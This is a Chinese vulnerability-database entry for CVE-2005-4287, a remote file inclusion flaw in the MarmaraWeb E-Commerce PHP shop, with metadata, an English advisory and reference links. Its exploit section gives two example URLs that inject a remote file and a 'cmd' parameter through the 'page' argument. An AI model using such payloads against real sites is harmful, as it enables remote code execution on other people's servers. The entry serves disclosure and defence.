MarmaraWeb E-Commerce远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109480 漏洞类型 输入验证
发布时间 2005-12-15 更新时间 2006-01-10
CVE编号 CVE-2005-4287 CNNVD-ID CNNVD-200512-343
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/26841
https://cxsecurity.com/issue/WLB-2005120043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-343
|漏洞详情
MarmaraWebE-commerce是用于运行网上商城的电子商务工具。由于没有争取过滤用户输入,导致E-Commerce中存在远程文件包含漏洞。攻击者可以利用这个漏洞包含有恶意PHP脚本的任意文件并以WebServer进程的权限执行。
|漏洞EXP
source: http://www.securityfocus.com/bid/15877/info

E-commerce is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the Web server process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. 

http://www.example.com/index.php?page=http://www.example.com/?&cmd=
http://www.example.com/?page=http://www.example.com/?&cmd=
|参考资料

来源:BID
名称:15877
链接:http://www.securityfocus.com/bid/15877
来源:BUGTRAQ
名称:20051215MarmaraWebE-commerceRemoteCommandExucetion
链接:http://www.securityfocus.com/archive/1/archive/1/419587/100/0/threaded
来源:OSVDB
名称:21903
链接:http://www.osvdb.org/21903
来源:SREASON
名称:263
链接:http://securityreason.com/securityalert/263